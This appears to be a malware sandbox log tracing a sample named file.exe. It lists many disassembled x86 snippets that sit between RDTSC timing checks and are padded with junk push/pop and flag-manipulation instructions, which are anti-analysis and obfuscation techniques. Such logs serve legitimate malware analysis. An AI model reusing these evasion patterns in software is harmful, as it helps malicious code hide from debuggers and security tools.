Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687BDD second address: 687BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687BE7 second address: 687BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691F2E second address: 691F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB3Dh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691F40 second address: 691F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691F46 second address: 691F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691F4A second address: 691F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FA6C4D39086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007FA6C4D39086h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69ADCA second address: 69ADE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA6C4C2AB41h 0x0000000a jo 00007FA6C4C2AB42h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69ADE8 second address: 69ADEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69D0A6 second address: 69D0AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69D0AA second address: 69D0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69D0B6 second address: 69D0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AA2AC second address: 6AA2BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AA2BD second address: 6AA2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C0AAE second address: 6C0AD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Ch 0x00000007 jmp 00007FA6C4D3908Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f ja 00007FA6C4D39086h 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C0AD4 second address: 6C0ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C0ADF second address: 6C0AE9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4D39086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BFF33 second address: 6BFF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BFF39 second address: 6BFF45 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4D39086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3402 second address: 6C3447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB46h 0x00000009 popad 0x0000000a pushad 0x0000000b jnp 00007FA6C4C2AB36h 0x00000011 jmp 00007FA6C4C2AB3Eh 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jg 00007FA6C4C2AB40h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C377A second address: 6C378E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jnp 00007FA6C4D39092h 0x0000000c js 00007FA6C4D3908Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C378E second address: 6C37A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA6C4C2AB3Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C39FB second address: 6C3A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3A01 second address: 6C3A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3A05 second address: 6C3A1C instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FA6C4D39086h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3A1C second address: 6C3A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3A2A second address: 6C3A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4D39099h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8146 second address: 6C816F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jnl 00007FA6C4C2AB36h 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007FA6C4C2AB47h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5C70 second address: 5E5C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50496 second address: 4D504D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6C4C2AB48h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504D0 second address: 4D504DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504DF second address: 4D504F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504F7 second address: 4D504FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504FB second address: 4D50512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007FA6C4C2AB3Ah 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50512 second address: 4D50524 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA6C4D3908Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50524 second address: 4D5058E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA6C4C2AB42h 0x00000008 and al, 00000078h 0x0000000b jmp 00007FA6C4C2AB3Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FA6C4C2AB44h 0x0000001c adc ax, 7CD8h 0x00000021 jmp 00007FA6C4C2AB3Bh 0x00000026 popfd 0x00000027 mov esi, 1050F78Fh 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FA6C4C2AB41h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D5058E second address: 4D505C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov si, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FA6C4D39091h 0x00000016 sbb ax, EDD6h 0x0000001b jmp 00007FA6C4D39091h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50601 second address: 4D50653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4C2AB41h 0x00000008 pushfd 0x00000009 jmp 00007FA6C4C2AB40h 0x0000000e adc cx, 50B8h 0x00000013 jmp 00007FA6C4C2AB3Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push 0E128D5Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA6C4C2AB42h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50653 second address: 4D50681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 67868EC9h 0x0000000f jmp 00007FA6C4D39094h 0x00000014 call 00007FA73590CA02h 0x00000019 push 759227D0h 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov eax, dword ptr [esp+10h] 0x00000029 mov dword ptr [esp+10h], ebp 0x0000002d lea ebp, dword ptr [esp+10h] 0x00000031 sub esp, eax 0x00000033 push ebx 0x00000034 push esi 0x00000035 push edi 0x00000036 mov eax, dword ptr [759B0140h] 0x0000003b xor dword ptr [ebp-04h], eax 0x0000003e xor eax, ebp 0x00000040 push eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 push dword ptr [ebp-08h] 0x00000047 mov eax, dword ptr [ebp-04h] 0x0000004a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000051 mov dword ptr [ebp-08h], eax 0x00000054 lea eax, dword ptr [ebp-10h] 0x00000057 mov dword ptr fs:[00000000h], eax 0x0000005d ret 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50681 second address: 4D50685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50685 second address: 4D506A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506A2 second address: 4D506CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA6C4C2AB3Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506CA second address: 4D506DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D3908Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506DA second address: 4D506DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506DE second address: 4D506EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506EF second address: 4D506F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506F3 second address: 4D506F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506F7 second address: 4D506FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506FD second address: 4D5070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D3908Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D5070F second address: 4D50728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50728 second address: 4D50743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39097h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50743 second address: 4D507D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov al, byte ptr [edx] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA6C4C2AB43h 0x00000013 xor si, B81Eh 0x00000018 jmp 00007FA6C4C2AB49h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FA6C4C2AB40h 0x00000024 sub ch, 00000018h 0x00000027 jmp 00007FA6C4C2AB3Bh 0x0000002c popfd 0x0000002d popad 0x0000002e inc edx 0x0000002f jmp 00007FA6C4C2AB46h 0x00000034 test al, al 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FA6C4C2AB47h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D507D6 second address: 4D507DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D507DC second address: 4D507E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D507E0 second address: 4D507D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FA6C4D38FDCh 0x00000011 mov al, byte ptr [edx] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FA6C4D39093h 0x0000001a xor si, B81Eh 0x0000001f jmp 00007FA6C4D39099h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FA6C4D39090h 0x0000002b sub ch, 00000018h 0x0000002e jmp 00007FA6C4D3908Bh 0x00000033 popfd 0x00000034 popad 0x00000035 inc edx 0x00000036 jmp 00007FA6C4D39096h 0x0000003b test al, al 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FA6C4D39097h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D507FC second address: 4D50839 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA6C4C2AB3Dh 0x00000008 add cx, 9276h 0x0000000d jmp 00007FA6C4C2AB41h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 sub edx, esi 0x00000018 pushad 0x00000019 movsx edx, cx 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 mov edi, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50839 second address: 4D50853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39096h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50853 second address: 4D508CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a pushad 0x0000000b push eax 0x0000000c mov bx, C7E6h 0x00000010 pop edi 0x00000011 popad 0x00000012 lea ebx, dword ptr [edi+01h] 0x00000015 jmp 00007FA6C4C2AB49h 0x0000001a mov al, byte ptr [edi+01h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FA6C4C2AB3Ch 0x00000024 sub ax, 76B8h 0x00000029 jmp 00007FA6C4C2AB3Bh 0x0000002e popfd 0x0000002f call 00007FA6C4C2AB48h 0x00000034 mov dh, cl 0x00000036 pop ebx 0x00000037 popad 0x00000038 inc edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D508CC second address: 4D508DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D508DB second address: 4D50959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov edi, 5F300AB6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA6C4C2AB43h 0x00000017 adc ecx, 0557E33Eh 0x0000001d jmp 00007FA6C4C2AB49h 0x00000022 popfd 0x00000023 jmp 00007FA6C4C2AB40h 0x00000028 popad 0x00000029 jne 00007FA7357F2C84h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushfd 0x00000033 jmp 00007FA6C4C2AB3Ch 0x00000038 xor eax, 37986768h 0x0000003e jmp 00007FA6C4C2AB3Bh 0x00000043 popfd 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50959 second address: 4D50977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FA6C4D39096h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50977 second address: 4D50996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov ecx, edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b call 00007FA6C4C2AB43h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50996 second address: 4D509F4 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FA6C4D39095h 0x0000000d xor esi, 45B14196h 0x00000013 jmp 00007FA6C4D39091h 0x00000018 popfd 0x00000019 popad 0x0000001a shr ecx, 02h 0x0000001d pushad 0x0000001e movzx ecx, di 0x00000021 movsx edi, ax 0x00000024 popad 0x00000025 rep movsd 0x00000027 rep movsd 0x00000029 rep movsd 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f pushad 0x00000030 mov cl, 27h 0x00000032 mov dh, BAh 0x00000034 popad 0x00000035 mov ecx, edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FA6C4D39091h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D509F4 second address: 4D509FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D509FA second address: 4D509FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D509FE second address: 4D50A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50A02 second address: 4D50AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 03h 0x0000000b jmp 00007FA6C4D3908Fh 0x00000010 rep movsb 0x00000012 pushad 0x00000013 jmp 00007FA6C4D39094h 0x00000018 pushfd 0x00000019 jmp 00007FA6C4D39092h 0x0000001e sbb cl, FFFFFFD8h 0x00000021 jmp 00007FA6C4D3908Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000002f jmp 00007FA6C4D39096h 0x00000034 mov eax, ebx 0x00000036 jmp 00007FA6C4D39090h 0x0000003b mov ecx, dword ptr [ebp-10h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA6C4D39097h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50AA1 second address: 4D50AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA6C4C2AB3Ch 0x00000017 adc si, 8F28h 0x0000001c jmp 00007FA6C4C2AB3Bh 0x00000021 popfd 0x00000022 push ecx 0x00000023 mov cx, bx 0x00000026 pop edi 0x00000027 popad 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50AF1 second address: 4D50AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50AF5 second address: 4D50AFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50AFB second address: 4D50B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f call 00007FA6C4D39093h 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50B2C second address: 4D50601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 call 00007FA6C4C2AB40h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 movsx edx, cx 0x00000013 pushfd 0x00000014 jmp 00007FA6C4C2AB48h 0x00000019 add ax, 78A8h 0x0000001e jmp 00007FA6C4C2AB3Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop ebx 0x00000026 jmp 00007FA6C4C2AB46h 0x0000002b leave 0x0000002c jmp 00007FA6C4C2AB40h 0x00000031 retn 0008h 0x00000034 cmp dword ptr [ebp-2Ch], 10h 0x00000038 mov eax, dword ptr [ebp-40h] 0x0000003b jnc 00007FA6C4C2AB35h 0x0000003d push eax 0x0000003e lea edx, dword ptr [ebp-00000590h] 0x00000044 push edx 0x00000045 call esi 0x00000047 push 00000008h 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FA6C4C2AB48h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50C36 second address: 4D50C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 7D9D5185h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, si 0x00000013 mov edi, eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50C4C second address: 4D50C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50C52 second address: 4D50C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
